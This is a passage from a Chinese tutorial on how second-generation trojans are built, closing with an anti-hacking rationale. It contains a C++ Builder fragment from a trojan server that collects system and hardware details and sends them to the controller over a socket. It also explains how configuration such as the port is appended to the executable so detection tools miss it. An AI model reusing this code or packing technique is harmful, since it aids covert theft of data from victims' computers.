fwrite(cs.c_str(),cs.Length(),1,fp);

　　bpp=GetDeviceCaps(Canvas->Handle ,BITSPIXEL);

　　tcs=pow(2,bpp); //计算色彩的梯度数

　　cp= GetDeviceCaps(Form1->Canvas->Handle,PLANES);

　　tc= pow(double(tcs),double(cp)); //计算色深

　　AnsiString sss;

　　sss=bpp;

　　cs="当前色深为:"+sss+"\n";

　　fwrite(cs.c_str(),cs.Length(),1,fp);

　　fclose(fp);

　　AnsiString FileName="temp.had";

　　char *buf;

　　TcpMsgUint Msg2;

　　strcpy(Msg2.TPassword,Password);

　　TMemoryStream *ms=new TMemoryStream;

　　ms->Clear();

　　if (!FileExists(FileName)) CheckHard();

　　TFileStream *fs=new TFileStream(FileName,fmOpenRead);

　　buf=new char[fs->Size+sizeof(TcpMsgUint)+1];

　　fs->Read(buf,fs->Size);

　　Msg2.Type=MsgGetHardWare;

　　Msg2.Length=fs->Size;

　　FileClose(fs->Handle);

　　ms->Write(&Msg2,sizeof(TcpMsgUint));

　　ms->Write(buf,Msg2.Length);

　　ms->Position=0;

　　delete []buf;

　　try{

　　sock->SendStream(ms);

　　}

　　catch(Exception&e) {

　　}

　　}

　　上面一段程序，基本上把相关的系统信息都取到了。

　　7、服务器端程序的包装与加密

　　用过冰河的人都知道，冰河允许用户自定义端口号。这样做的目的，是为了防止被反黑程序检测出来，这种功能是如何实现的呢？

　　首先让我们来做一个实验：

　　进入Windows的命令行模式下做如下操作

　　1）C:\>copy Server.Exe Server.Bak

　　2）建立一个文本文件Test.Txt，其内容为“http://www.patching.net”

　　3）C:\>type Text.Txt>>Server.Exe

　　4）运行Server.Exe

　　怎么样？是不是发现Server.Exe仍然可以运行呢？木马服务器端自定制的奥秘就在这里：首先生成了一个EXE文件，这个EXE文件里有一项读取自身进程内容的操作，读取时，文件的指针直接指向进程的末尾，从末尾的倒数N个字节处取得用户定制的信息，比如端口号等，然后传递给程序的相关部分进行处理。这里不给出相关的代码部分，有兴趣的朋友请参考一些文件打包程序代码，它所使用的技术是大同小异的。

　　8、总结

　　以上讲的几点技术，基本上包括了所有第二代木马的特点，个别的木马程序支持服务器列表，宏传播等，实现上大同小异。随着技术的不断更新和发展，相信离第五代木马出现的日子已经不远了，黑与反黑，如此往复的的进行下去，看来反黑工作要走的路还很长，从根本上防止木马，也只有从我们自身对木马的认识开始，希望这篇文章在您阅读之后能带给您一些反黑技术上的帮助。